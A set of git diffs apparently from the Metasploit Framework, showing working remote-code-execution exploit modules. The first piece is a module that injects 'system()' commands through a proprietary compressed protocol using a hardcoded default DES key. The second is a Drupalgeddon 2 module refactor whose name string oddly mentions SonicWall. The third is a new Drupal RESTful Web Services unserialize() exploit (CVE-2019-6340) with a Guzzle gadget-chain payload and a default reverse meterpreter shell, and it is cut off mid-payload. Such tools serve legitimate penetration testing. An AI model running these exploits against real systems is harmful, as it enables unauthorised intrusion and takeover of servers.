+    msg_type = ret_data[4, 1] # rubocop:disable Lint/UselessAssignment
+    comp_flag = ret_data[5, 1]
+
+    payload_data = ret_data[6..-1]
+    if comp_flag == "\x00"
+      bin_data = payload_data.unpack1("H*") # rubocop:disable Lint/UselessAssignment
+      payload_data = @inflater.inflate(payload_data)
+    end
+
+    return payload_data
+
+  end
+
+  def run_cmd(cmd)
+
+    user_num = rand 1000..9999
+    msg_1 = %(R_E
+{
+\tRE_ID=1
+\tRE_PDESC=0\tRemPsl\tsystem("#{cmd}");\tRemPsl_user_#{user_num}
+\tRE_ORG=PemApi
+\tRE_SEV=1
+\tRE_NSEV=5
+\tRE_ST=
+}
+)
+
+    msg_1 += "\x00"
+    # Compress the message
+    comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
+    send_msg(0x44, 0x0, comp_data)
+
+  end
+
+  def identify(user)
+
+    inner_len = 15
+    msg_type = 8
+    len_str = [inner_len].pack("N")
+    msg_str = [msg_type].pack("N")
+    msg_1 = %(PEM_MSG
+{
+\tNSDL=#{inner_len}
+\tPEM_DGRAM=#{len_str}#{msg_str}#{user}\x00
+}
+)
+    msg_1 += "\x00"
+    print_status("Msg: #{msg_1}")
+    bin_data = msg_1.unpack1("H*") # rubocop:disable Lint/UselessAssignment
+    # Compress the message
+    comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
+    send_msg(0x44, 0x0, comp_data)
+
+  end
+
+  def create_session
+    sess_msg = "\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\x00\x04\x02\x04\x03\x10\x00\x00\x03\x04\x00\x00\x00\x00\x01\x01\x04\x00\xff\x00\x00\x00"
+    sess_msg += "\x00" * 0x68
+    send_msg(0x45, 0x2, sess_msg)
+  end
+
+  def authenticate_user(user, password)
+    # Default encryption key
+    enc_key = 'k$C4}@"_'
+    output_data = des_crypt_func(password, enc_key, DES_ENCRYPT)
+    # Convert to hex string
+    encrpted_pw = output_data.unpack1("H*")
+    des_pw = encrpted_pw.upcase
+
+    msg_1 = %(ID
+{
+\tHOST=user
+\tUSER=#{user}
+\tPASS=#{des_pw}
+\tVER=V9.6.00
+\tT=PEMAPI
+\tHTBT=1
+\tTMOT=1728000
+\tRTRS=3
+}
+)
+
+    msg_1 += "\x00"
+    comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
+    send_msg(0x44, 0x0, comp_data)
+
+  end
+
+  def rotate_block_init(input_block_tuple)
+
+    v6 = 0
+    v5 = 0
+    input_block_tuple = input_block_tuple.pack("V*").unpack("i*")
+    v3 = input_block_tuple[0]
+    v4 = input_block_tuple[1]
+
+    if (v4 & 0x2000000) != 0
+      v5 = 1
+    end
+    if (v4 & 0x20000) != 0
+      v5 |= 2
+    end
+    if (v4 & 0x200) != 0
+      v5 |= 4
+    end
+    if (v4 & 2) != 0
+      v5 |= 8
+    end
+    if (v3 & 0x2000000) != 0
+      v5 |= 0x10
+    end
+    if (v3 & 0x20000) != 0
+      v5 |= 0x20
+    end
+    if (v3 & 0x200) != 0
+      v5 |= 0x40
+    end
+    if (v3 & 2) != 0
+      v5 |= 0x80
+    end
+    if (v4 & 0x8000000) != 0
+      v5 |= 0x100
+    end
+    if (v4 & 0x80000) != 0
+      v5 |= 0x200
+    end
+    if (v4 & 0x800) != 0
+      v5 |= 0x400
+    end
+    if (v4 & 8) != 0
+      v5 |= 0x800
+    end
+    if (v3 & 0x8000000) != 0
+      v5 |= 0x1000
+    end
+    if (v3 & 0x80000) != 0
+      v5 |= 0x2000
+    end
+    if (v3 & 0x800) != 0
+      v5 |= 0x4000
+    end
+    if (v3 & 8) != 0
+      v5 |= 0x8000
+    end
+    if (v4 & 0x20000000) != 0
+      v5 |= 0x10000
+    end
+    if (v4 & 0x200000) != 0
+      v5 |= 0x20000
+    end
+    if (v4 & 0x2000) != 0
+      v5 |= 0x40000
+    end
+    if (v4 & 0x20) != 0
+      v5 |= 0x80000
+    end
+    if (v3 & 0x20000000) != 0
+      v5 |= 0x100000
+    end
+    if (v3 & 0x200000) != 0
+      v5 |= 0x200000
+    end
+    if (v3 & 0x2000) != 0
+      v5 |= 0x400000
+    end
+    if (v3 & 0x20) != 0
+      v5 |= 0x800000
+    end
+    if (v4 < 0)
+      v5 |= 0x1000000
+    end
+    if (v4 & 0x800000) != 0
+      v5 |= 0x2000000
+    end
+    if (v4 & 0x8000) != 0
+      v5 |= 0x4000000
+    end
+    if (v4 & 0x80) != 0
+      v5 |= 0x8000000
+    end
+    if (v3 < 0)
+      v5 |= 0x10000000
+    end
+    if (v3 & 0x800000) != 0
+      v5 |= 0x20000000
+    end
+    if (v3 & 0x8000) != 0
+      v5 |= 0x40000000
+    end
+    if (v3 & 0x80) != 0
+      v5 |= 0x80000000
+    end
+    if (v4 & 0x1000000) != 0
+      v6 = 1
+    end
+    if (v4 & 0x10000) != 0
+      v6 |= 2
+    end
+    if (v4 & 0x100) != 0
+      v6 |= 4
+    end
+    if (v4 & 1) != 0
+      v6 |= 8
+    end
+    if (v3 & 0x1000000) != 0
+      v6 |= 0x10
+    end
+    if (v3 & 0x10000) != 0
+      v6 |= 0x20
+    end
+    if (v3 & 0x100) != 0
+      v6 |= 0x40
+    end
+    if (v3 & 1) != 0
+      v6 |= 0x80
+    end
+    if (v4 & 0x4000000) != 0
+      v6 |= 0x100
+    end
+    if (v4 & 0x40000) != 0
+      v6 |= 0x200
+    end
+    if (v4 & 0x400) != 0
+      v6 |= 0x400
+    end
+    if (v4 & 4) != 0
+      v6 |= 0x800
+    end
+    if (v3 & 0x4000000) != 0
+      v6 |= 0x1000
+    end
+    if (v3 & 0x40000) != 0
+      v6 |= 0x2000
+    end
+    if (v3 & 0x400) != 0
+      v6 |= 0x4000
+    end
+    if (v3 & 4) != 0
+      v6 |= 0x8000
+    end
+    if (v4 & 0x10000000) != 0
+      v6 |= 0x10000
+    end
+    if (v4 & 0x100000) != 0
+      v6 |= 0x20000
+    end
+    if (v4 & 0x1000) != 0
+      v6 |= 0x40000
+    end
+    if (v4 & 0x10) != 0
+      v6 |= 0x80000
+    end
+    if (v3 & 0x10000000) != 0
+      v6 |= 0x100000
+    end
+    if (v3 & 0x100000) != 0
+      v6 |= 0x200000
+    end
+    if (v3 & 0x1000) != 0
+      v6 |= 0x400000
+    end
+    if (v3 & 0x10) != 0
+      v6 |= 0x800000
+    end
+    if (v4 & 0x40000000) != 0
+      v6 |= 0x1000000
+    end
+    if (v4 & 0x400000) != 0
+      v6 |= 0x2000000
+    end
+    if (v4 & 0x4000) != 0
+      v6 |= 0x4000000
+    end
+    if (v4 & 0x40) != 0
+      v6 |= 0x8000000
+    end
+    if (v3 & 0x40000000) != 0
+      v6 |= 0x10000000
+    end
+    if (v3 & 0x400000) != 0
+      v6 |= 0x20000000
+    end
+    if (v3 & 0x4000) != 0
+      v6 |= 0x40000000
+    end
+    if (v3 & 0x40) != 0
+      v6 |= 0x80000000
+    end
+
+    # Create return tuple
+    ret_block = Array.new
+    ret_block.push v5
+    ret_block.push v6
+    ret_block
+  end
+
+  def rotate_block_final(input_block_tuple)
+
+    v6 = 0
+    v5 = 0
+    input_block_tuple = input_block_tuple.pack("V*").unpack("i*")
+    v3 = input_block_tuple[0]
+    v4 = input_block_tuple[1]
+
+    if (v4 & 0x80) != 0
+      v5 = 1
+    end
+    if (v3 & 0x80) != 0
+      v5 |= 2
+    end
+    if (v4 & 0x8000) != 0
+      v5 |= 4
+    end
+    if (v3 & 0x8000) != 0
+      v5 |= 8
+    end
+    if (v4 & 0x800000) != 0
+      v5 |= 0x10
+    end
+    if (v3 & 0x800000) != 0
+      v5 |= 0x20
+    end
+    if (v4 < 0)
+      v5 |= 0x40
+    end
+    if (v3 < 0)
+      v5 |= 0x80
+    end
+    if (v4 & 0x40) != 0
+      v5 |= 0x100
+    end
+    if (v3 & 0x40) != 0
+      v5 |= 0x200
+    end
+    if (v4 & 0x4000) != 0
+      v5 |= 0x400
+    end
+    if (v3 & 0x4000) != 0
+      v5 |= 0x800
+    end
+    if (v4 & 0x400000) != 0
+      v5 |= 0x1000
+    end
+    if (v3 & 0x400000) != 0
+      v5 |= 0x2000
+    end
+    if (v4 & 0x40000000) != 0
+      v5 |= 0x4000
+    end
+    if (v3 & 0x40000000) != 0
+      v5 |= 0x8000
+    end
+    if (v4 & 0x20) != 0
+      v5 |= 0x10000
+    end
+    if (v3 & 0x20) != 0
+      v5 |= 0x20000
+    end
+    if (v4 & 0x2000) != 0
+      v5 |= 0x40000
+    end
+    if (v3 & 0x2000) != 0
+      v5 |= 0x80000
+    end
+    if (v4 & 0x200000) != 0
+      v5 |= 0x100000
+    end
+    if (v3 & 0x200000) != 0
+      v5 |= 0x200000
+    end
+    if (v4 & 0x20000000) != 0
+      v5 |= 0x400000
+    end
+    if (v3 & 0x20000000) != 0
+      v5 |= 0x800000
+    end
+    if (v4 & 0x10) != 0
+      v5 |= 0x1000000
+    end
+    if (v3 & 0x10) != 0
+      v5 |= 0x2000000
+    end
+    if (v4 & 0x1000) != 0
+      v5 |= 0x4000000
+    end
+    if (v3 & 0x1000) != 0
+      v5 |= 0x8000000
+    end
+    if (v4 & 0x100000) != 0
+      v5 |= 0x10000000
+    end
+    if (v3 & 0x100000) != 0
+      v5 |= 0x20000000
+    end
+    if (v4 & 0x10000000) != 0
+      v5 |= 0x40000000
+    end
+    if (v3 & 0x10000000) != 0
+      v5 |= 0x80000000
+    end
+    if (v4 & 8) != 0
+      v6 = 1
+    end
+    if (v3 & 8) != 0
+      v6 |= 2
+    end
+    if (v4 & 0x800) != 0
+      v6 |= 4
+    end
+    if (v3 & 0x800) != 0
+      v6 |= 8
+    end
+    if (v4 & 0x80000) != 0
+      v6 |= 0x10
+    end
+    if (v3 & 0x80000) != 0
+      v6 |= 0x20
+    end
+    if (v4 & 0x8000000) != 0
+      v6 |= 0x40
+    end
+    if (v3 & 0x8000000) != 0
+      v6 |= 0x80
+    end
+    if (v4 & 4) != 0
+      v6 |= 0x100
+    end
+    if (v3 & 4) != 0
+      v6 |= 0x200
+    end
+    if (v4 & 0x400) != 0
+      v6 |= 0x400
+    end
+    if (v3 & 0x400) != 0
+      v6 |= 0x800
+    end
+    if (v4 & 0x40000) != 0
+      v6 |= 0x1000
+    end
+    if (v3 & 0x40000) != 0
+      v6 |= 0x2000
+    end
+    if (v4 & 0x4000000) != 0
+      v6 |= 0x4000
+    end
+    if (v3 & 0x4000000) != 0
+      v6 |= 0x8000
+    end
+    if (v4 & 2) != 0
+      v6 |= 0x10000
+    end
+    if (v3 & 2) != 0
+      v6 |= 0x20000
+    end
+    if (v4 & 0x200) != 0
+      v6 |= 0x40000
+    end
+    if (v3 & 0x200) != 0
+      v6 |= 0x80000
+    end
+    if (v4 & 0x20000) != 0
+      v6 |= 0x100000
+    end
+    if (v3 & 0x20000) != 0
+      v6 |= 0x200000
+    end
+    if (v4 & 0x2000000) != 0
+      v6 |= 0x400000
+    end
+    if (v3 & 0x2000000) != 0
+      v6 |= 0x800000
+    end
+    if (v4 & 1) != 0
+      v6 |= 0x1000000
+    end
+    if (v3 & 1) != 0
+      v6 |= 0x2000000
+    end
+    if (v4 & 0x100) != 0
+      v6 |= 0x4000000
+    end
+    if (v3 & 0x100) != 0
+      v6 |= 0x8000000
+    end
+    if (v4 & 0x10000) != 0
+      v6 |= 0x10000000
+    end
+    if (v3 & 0x10000) != 0
+      v6 |= 0x20000000
+    end
+    if (v4 & 0x1000000) != 0
+      v6 |= 0x40000000
+    end
+    if (v3 & 0x1000000) != 0
+      v6 |= 0x80000000
+    end
+
+    # Create return tuple
+    ret_block = Array.new
+    ret_block.push v5
+    ret_block.push v6
+    ret_block
+  end
+
+  def load(a1)
+    a2 = Array.new(8, 0)
+    v3 = a1
+    a2[0] = a1 & 0xff
+    v3 >>= 3
+    a2[1] = v3 & 0xff
+    v3 >>= 4
+    a2[2] = v3 & 0xff
+    v3 >>= 4
+    a2[3] = v3 & 0xff
+    v3 >>= 4
+    a2[4] = v3 & 0xff
+    v3 >>= 4
+    a2[5] = v3 & 0xff
+    v3 >>= 4
+    a2[6] = v3 & 0xff
+    v3 >>= 4
+    a2[7] = v3 & 0xff
+    a2[0] = (a2[0] * 2) & 0xff
+    a2[7] |= (16 * a2[0]) & 0xff
+    v3 >>= 4
+    a2[0] |= v3 & 0xff
+
+    data_block = a2.pack("c*").unpack("V*")
+    data_block[0] &= 0x3F3F3F3F
+    data_block[1] &= 0x3F3F3F3F
+    data_block
+  end
+
+  def desx(data_block, ksch, idx)
+    ksch = ksch.pack("V*")
+    ksch = ksch.unpack("Q<*")
+    key_block = ksch[idx]
+
+    data_block_ptr = data_block.pack("V*")
+    data_block_ptr = data_block_ptr.unpack1("Q<*")
+    data_block_ptr ^= key_block
+
+    counter = 1
+    data_block_byte_ptr = [data_block_ptr].pack('Q<')
+    left = SBOXES[data_block_byte_ptr[0].ord]
+    right = SBOXES[data_block_byte_ptr[0].ord + (counter << 6)]
+    counter += 1
+    left ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)]
+    counter += 1
+    right ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)]
+    counter += 1
+    left ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)]
+    counter += 1
+    right ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)]
+    counter += 1
+    left ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)]
+    counter += 1
+    right ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)]
+    counter += 1
+    left ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)]
+    counter += 1
+    right ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)]
+    counter += 1
+    left ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)]
+    counter += 1
+    right ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)]
+    counter += 1
+    left ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)]
+    counter += 1
+    right ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)]
+    counter += 1
+    left ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)]
+    counter += 1
+    right ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)]
+
+    # Create return tuple
+    ret_block = Array.new
+    ret_block.push left
+    ret_block.push right
+    ret_block
+
+  end
+
+  def store(data_block)
+    a1 = data_block.pack("V*")
+    val = 8 * (16 * (16 * (16 * (16 * (16 * (16 * a1[7].ord | a1[6].ord) | a1[5].ord) | a1[4].ord) | a1[3].ord) | a1[2].ord) | a1[1].ord) | a1[0].ord >> 1
+    val & 0xffffffff
+  end
+
+  def sbox_xors(data_block_in, ksch_arg, decrypt_flag)
+
+    decrypt_flag_cpy = decrypt_flag
+    if (decrypt_flag & 0x100) != 0
+      data_block_0 = data_block_in
+    else
+      data_block_0 = rotate_block_init(data_block_in)
+    end
+
+    encrypt_flag = (decrypt_flag_cpy & 1) == 0
+    ti_block_0 = load(data_block_0[0])
+    ti_block_1 = load(data_block_0[1])
+
+    for i in 0..15
+      ti_cpy = ti_block_1
+      if encrypt_flag
+        ti_block_1 = desx(ti_block_1, ksch_arg, i)
+      else
+        ti_block_1 = desx(ti_block_1, ksch_arg, 15 - i)
+      end
+      ti_block_1[0] ^= ti_block_0[0]
+      ti_block_1[1] ^= ti_block_0[1]
+      ti_block_0 = ti_cpy
+    end
+
+    data_block_0[0] = store(ti_block_1)
+    data_block_0[1] = store(ti_block_0)
+
+    if (!(decrypt_flag_cpy & 0x200) != 0)
+      rotate_block_final(data_block_0)
+    else
+      data_block_0
+    end
+
+  end
+
+  def gen_key_unchecked(key)
+
+    idx = 0
+    key_arr = key.unpack("V*")
+    key_sch = Array.new
+    for i in 0..15
+      idx += ROTATIONS[i].ord
+      v6 = 0
+      v5 = 0
+      v14 = 0
+      for j in 0..47
+        pc2_p1 = (idx + PC2[j].ord) % 0x1C
+        if PC2[j].ord > 0x1B
+          pc2_p2 = 0x1c
+        else
+          pc2_p2 = 0
+        end
+        v13 = PC1[pc2_p1 + pc2_p2].ord
+        if v13 <= 31
+          v12 = 0
+        else
+          v12 = 1
+          v13 -= 32
+        end
+        if j <= 23
+          v10 = j
+        else
+          v14 = 1
+          v10 = j - 24
+        end
+        v11 = 8 * (v10 / 6) + v10 % 6
+        key_and = key_arr[v12] & SBOX_BYTE_ORDER[v13]
+
+        if (key_and != 0)
+          if v14 == 1
+            v6 |= SBOX_BYTE_ORDER[v11]
+          else
+            v5 |= SBOX_BYTE_ORDER[v11]
+          end
+        end
+      end
+      key_sch.push v5
+      key_sch.push v6
+    end
+    key_sch
+  end
+
+  def des_string_to_key(key_buf_str)
+
+    des_keysch_0 = gen_key_unchecked(INIT_DES_KEY_0)
+    des_keysch_1 = gen_key_unchecked(INIT_DES_KEY_1)
+
+    temp_key1 = Array.new(8, 0)
+    temp_key2 = Array.new(8, 0)
+
+    key_buf_bytes = key_buf_str.unpack("c*")
+
+    counter = 0
+    key_buf_str_len = key_buf_bytes.length - 1
+    for i in 0..key_buf_str_len
+      counter %= 8
+      temp_key1[counter] |= key_buf_bytes[i]
+      temp_key2[counter] |= key_buf_bytes[i]
+
+      data_block = temp_key1.pack("c*").unpack("V*")
+      temp_key1 = sbox_xors(data_block, des_keysch_0, 0)
+      temp_key1 = temp_key1.pack("V*").unpack("c*")
+
+      data_block = temp_key2.pack("c*").unpack("V*")
+      temp_key2 = sbox_xors(data_block, des_keysch_1, 0)
+      temp_key2 = temp_key2.pack("V*").unpack("c*")
+      counter += 1
+    end
+
+    # Prepare the return array
+    ret_key = Array.new(8, 0)
+    for j in 0..7
+      ret_key[j] = temp_key2[j] ^ temp_key1[j]
+    end
+    ret_key.pack("c*")
+  end
+
+  def des_cbc(input_buf, key_sch, iv, decrypt_flag)
+
+    output_block_arr = Array.new
+    blocks = input_buf.unpack("Q<*")
+    for i in 0..blocks.length - 1
+
+      current_block = blocks[i]
+      if decrypt_flag == 1
+        cur_block = current_block
+      else
+        current_block ^= iv
+      end
+
+      current_block_tuple = [current_block].pack("Q<").unpack("V*")
+      output_block_tuple = sbox_xors(current_block_tuple, key_sch, decrypt_flag)
+      output_block = output_block_tuple.pack("V*").unpack1("Q<")
+      output_block_arr.push output_block
+
+      if decrypt_flag == 1
+        output_block ^= iv
+        iv = cur_block
+      else
+        iv = output_block
+      end
+    end
+
+    output_block_arr.pack("Q<*")
+
+  end
+
+  def des_crypt_func(binary_buf, key_buf, decrypt_flag)
+    des_key = des_string_to_key(key_buf)
+    des_keysch = gen_key_unchecked(des_key)
+
+    temp_enc_buf = Array.new(8 * ((binary_buf.length + 7) >> 3) + 8, 0)
+    binary_buf_str = binary_buf.unpack('c*')
+
+    for j in 0..binary_buf_str.length - 1
+      temp_enc_buf[j] = binary_buf_str[j]
+    end
+
+    temp_enc_buf = temp_enc_buf.pack('c*')
+    output_buf = des_cbc(temp_enc_buf, des_keysch, 0, decrypt_flag)
+    output_buf
+  end
+
+end
@@ -11,8 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote

  def initialize(info={})
    super(update_info(info,
-      'Name' => "SonicWall Global Management System XMLRPC
-                 set_time_zone Unath RCE",
+      'Name' => "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE",
      'Description' => %q{
        This module exploits a vulnerability in SonicWall Global
        Management System Virtual Appliance versions 8.1 (Build 8110.1197)
@@ -122,13 +122,13 @@ class MetasploitModule < Msf::Exploit::Remote
        ]
      ],
      'DefaultTarget'  => 0, # Automatic (PHP In-Memory)
-      'DefaultOptions' => {'WfsDelay' => 2},
+      'DefaultOptions' => {'WfsDelay' => 2}, # Also seconds between attempts
      'Notes'          => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}
    ))

    register_options([
      OptString.new('PHP_FUNC',  [true, 'PHP function to execute', 'passthru']),
-      OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false])
+      OptBool.new('DUMP_OUTPUT', [false, 'Dump payload command output', false])
    ])

    register_advanced_options([
@@ -138,33 +138,44 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def check
-    checkcode = CheckCode::Safe
+    checkcode = CheckCode::Unknown

    @version = target['Version'] || drupal_version

-    if @version
-      print_status("Drupal #{@version} targeted at #{full_uri}")
-      checkcode = CheckCode::Detected
-    else
-      print_error('Could not determine Drupal version to target')
-      return CheckCode::Unknown
+    unless @version
+      vprint_error('Could not determine Drupal version to target')
+      return checkcode
    end

+    vprint_status("Drupal #{@version} targeted at #{full_uri}")
+    checkcode = CheckCode::Detected
+
    changelog = drupal_changelog(@version)

-    if changelog && changelog.include?('SA-CORE-2018-002')
-      print_warning('Drupal appears patched in CHANGELOG.txt')
-    elsif changelog
-      print_good('Drupal appears unpatched in CHANGELOG.txt')
-      checkcode = CheckCode::Appears
-    else
-      print_error('Could not determine Drupal patch level')
+    unless changelog
+      vprint_error('Could not determine Drupal patch level')
+      return checkcode
    end

-    token = random_crap
+    case drupal_patch(changelog, 'SA-CORE-2018-002')
+    when nil
+      vprint_warning('CHANGELOG.txt no longer contains patch level')
+    when true
+      vprint_warning('Drupal appears patched in CHANGELOG.txt')
+      checkcode = CheckCode::Safe
+    when false
+      vprint_good('Drupal appears unpatched in CHANGELOG.txt')
+      checkcode = CheckCode::Appears
+    end
+
+    # NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable
+    token = rand_str
    res   = execute_command(token, func: 'printf')

-    if res && res.body.start_with?(token)
+    return checkcode unless res
+
+    if res.body.start_with?(token)
+      vprint_good('Drupal is vulnerable to code execution')
      checkcode = CheckCode::Vulnerable
    end

@@ -172,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def exploit
-    if check == CheckCode::Safe && datastore['ForceExploit'] == false
+    if check == CheckCode::Safe && !datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
    end

@@ -211,7 +222,7 @@ class MetasploitModule < Msf::Exploit::Remote

  def dropper_assert
    php_file = Pathname.new(
-      "#{datastore['WritableDir']}/#{random_crap}.php"
+      "#{datastore['WritableDir']}/#{rand_str}.php"
    ).cleanpath

    # Return the PHP payload or a PHP binary dropper
@@ -242,7 +253,7 @@ class MetasploitModule < Msf::Exploit::Remote
  end

  def dropper_exec
-    php_file = "#{random_crap}.php"
+    php_file = "#{rand_str}.php"
    tmp_file = Pathname.new(
      "#{datastore['WritableDir']}/#{php_file}"
    ).cleanpath
@@ -298,13 +309,12 @@ class MetasploitModule < Msf::Exploit::Remote
        exploit_drupal8(func, cmd)
      end

-    if res && res.code != 200
-      print_error("Unexpected reply: #{res.inspect}")
-      return
-    end
+    return unless res

-    if res && datastore['DUMP_OUTPUT']
-      print_line(res.body)
+    if res.code == 200
+      print_line(res.body) if datastore['DUMP_OUTPUT']
+    else
+      print_error("Unexpected reply: #{res.inspect}")
    end

    res
@@ -380,7 +390,7 @@ class MetasploitModule < Msf::Exploit::Remote
    )
  end

-  def random_crap
+  def rand_str
    Rex::Text.rand_text_alphanumeric(8..42)
  end

@@ -0,0 +1,266 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  # NOTE: All (four) Web Services modules need to be enabled
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HTTP::Drupal
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'               => 'Drupal RESTful Web Services unserialize() RCE',
+      'Description'        => %q{
+        This module exploits a PHP unserialize() vulnerability in Drupal RESTful
+        Web Services by sending a crafted request to the /node REST endpoint.
+
+        As per SA-CORE-2019-003, the initial remediation was to disable POST,
+        PATCH, and PUT, but Ambionics discovered that GET was also vulnerable
+        (albeit cached). Cached nodes can be exploited only once.
+
+        Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of
+        this alternate vector.
+
+        Drupal < 8.5.11 and < 8.6.10 are vulnerable.
+      },
+      'Author'             => [
+        'Jasper Mattsson', # Discovery
+        'Charles Fol',     # PoC
+        'Rotem Reiss',     # Module
+        'wvu'              # Module
+      ],
+      'References'         => [
+        ['CVE', '2019-6340'],
+        ['URL', 'https://www.drupal.org/sa-core-2019-003'],
+        ['URL', 'https://www.drupal.org/psa-2019-02-22'],
+        ['URL', 'https://www.ambionics.io/blog/drupal8-rce'],
+        ['URL', 'https://github.com/ambionics/phpggc'],
+        ['URL', 'https://twitter.com/jcran/status/1099206271901798400']
+      ],
+      'DisclosureDate'     => '2019-02-20',
+      'License'            => MSF_LICENSE,
+      'Platform'           => ['php', 'unix'],
+      'Arch'               => [ARCH_PHP, ARCH_CMD],
+      'Privileged'         => false,
+      'Targets'            => [
+        ['PHP In-Memory',
+          'Platform'       => 'php',
+          'Arch'           => ARCH_PHP,
+          'Type'           => :php_memory,
+          'Payload'        => {'BadChars' => "'"},
+          'DefaultOptions' => {
+            'PAYLOAD'      => 'php/meterpreter/reverse_tcp'
+          }
+        ],
+        ['Unix In-Memory',
+          'Platform'       => 'unix',
+          'Arch'           => ARCH_CMD,
+          'Type'           => :unix_memory,
+          'DefaultOptions' => {
+            'PAYLOAD'      => 'cmd/unix/generic',
+            'CMD'          => 'id'
+          }
+        ]
+      ],
+      'DefaultTarget'      => 0,
+      'Notes'              => {
+        'Stability'        => [CRASH_SAFE],
+        'SideEffects'      => [IOC_IN_LOGS],
+        'Reliablity'       => [UNRELIABLE_SESSION], # When using the GET method
+        'AKA'              => ['SA-CORE-2019-003']
+      }
+    ))
+
+    register_options([
+      OptEnum.new('METHOD', [true, 'HTTP method to use', 'POST',
+                            ['GET', 'POST', 'PATCH', 'PUT']]),
+      OptInt.new('NODE',    [false, 'Node ID to target with GET method', 1])
+    ])
+
+    register_advanced_options([
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
+    ])
+  end
+
+  def check
+    checkcode = CheckCode::Unknown
+
+    version = drupal_version
+
+    unless version
+      vprint_error('Could not determine Drupal version')
+      return checkcode
+    end
+
+    if version.to_s !~ /^8\b/
+      vprint_error("Drupal #{version} is not supported")
+      return CheckCode::Safe
+    end
+
+    vprint_status("Drupal #{version} targeted at #{full_uri}")
+    checkcode = CheckCode::Detected
+
+    changelog = drupal_changelog(version)
+
+    unless changelog
+      vprint_error('Could not determine Drupal patch level')
+      return checkcode
+    end
+
+    case drupal_patch(changelog, 'SA-CORE-2019-003')
+    when nil
+      vprint_warning('CHANGELOG.txt no longer contains patch level')
+    when true
+      vprint_warning('Drupal appears patched in CHANGELOG.txt')
+      checkcode = CheckCode::Safe
+    when false
+      vprint_good('Drupal appears unpatched in CHANGELOG.txt')
+      checkcode = CheckCode::Appears
+    end
+
+    # Any further with GET and we risk caching the targeted node
+    return checkcode if meth == 'GET'
+
+    # NOTE: Exploiting the vuln will move us from "Safe" to Vulnerable
+    token = Rex::Text.rand_text_alphanumeric(8..42)
+    res   = execute_command("echo #{token}")
+
+    return checkcode unless res
+
+    if res.body.include?(token)
+      vprint_good('Drupal is vulnerable to code execution')
+      checkcode = CheckCode::Vulnerable
+    end
+
+    checkcode
+  end
+
+  def exploit
+    if [CheckCode::Safe, CheckCode::Unknown].include?(check)
+      if datastore['ForceExploit']
+        print_warning('ForceExploit set! Exploiting anyway!')
+      else
+        fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+      end
+    end
+
+    if datastore['PAYLOAD'] == 'cmd/unix/generic'
+      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
+      # XXX: Naughty datastore modification
+      datastore['DUMP_OUTPUT'] = true
+    end
+
+    case target['Type']
+    when :php_memory
+      # XXX: This will spawn a *very* obvious process
+      execute_command("php -r '#{payload.encoded}'")
+    when :unix_memory
+      execute_command(payload.encoded)
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    vprint_status("Executing with system(): #{cmd}")
+
+    # https://en.wikipedia.org/wiki/Hypertext_Application_Language
+    hal_json = JSON.pretty_generate(
+      'link'      => [
+        'value'   => 'link',
+        'options' => phpggc_payload(cmd)
+      ],
+      '_links'    => {
+        'type'    => {
+          'href'  => vhost_uri
+        }
+      }
+    )
+
+    print_status("Sending #{meth} to #{node_uri} with link #{vhost_uri}")
+
+    res = send_request_cgi({
+      'method'   => meth,
+      'uri'      => node_uri,
+      'ctype'    => 'application/hal+json',
+      'vars_get' => {'_format' => 'hal_json'},
+      'data'     => hal_json
+    }, 3.5)
+
+    return unless res
+
+    case res.code
+    # 401 isn't actually a failure when using the POST method
+    when 200, 401
+      print_line(res.body) if datastore['DUMP_OUTPUT']
+      if meth == 'GET'
+        print_warning('If you did not get code execution, try a new node ID')
+      end
+    when 404
+      print_error("#{node_uri} not found")
+    when 405
+      print_error("#{meth} method not allowed")
+    when 422
+      print_error('VHOST may need to be set')
+    when 406
+      print_error('Web Services may not be enabled')
+    else
+      print_error("Unexpected reply: #{res.inspect}")
+    end
+
+    res
+  end
+
+  # phpggc Guzzle/RCE1 system id
+  def phpggc_payload(cmd)
+    (
+      # http://www.phpinternalsbook.com/classes_objects/serialization.html
+      <<~EOF
+        O:24:"GuzzleHttp\\Psr7\\FnStream":2:{
+          s:33:"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods";a:1:{
+            s:5:"close";a:2:{
+              i:0;O:23:"GuzzleHttp\\HandlerStack":3:{
+                s:32:"\u0000GuzzleHttp\\HandlerStack\u0000handler";
+                  s:cmd_len:"cmd";
+                s:30:"\u0000GuzzleHttp\\HandlerStack\u0000stack";
+                  a:1:{i:0;a:1:{i:0;s:6:"system";}}
+                s:31:"\u0000GuzzleHttp\\HandlerStack\u0000cached";
+                  b:0;
+              }
+              i:1;s:7:"resolve";
+            }
+          }
+          s:9:"_fn_close";a:2:{
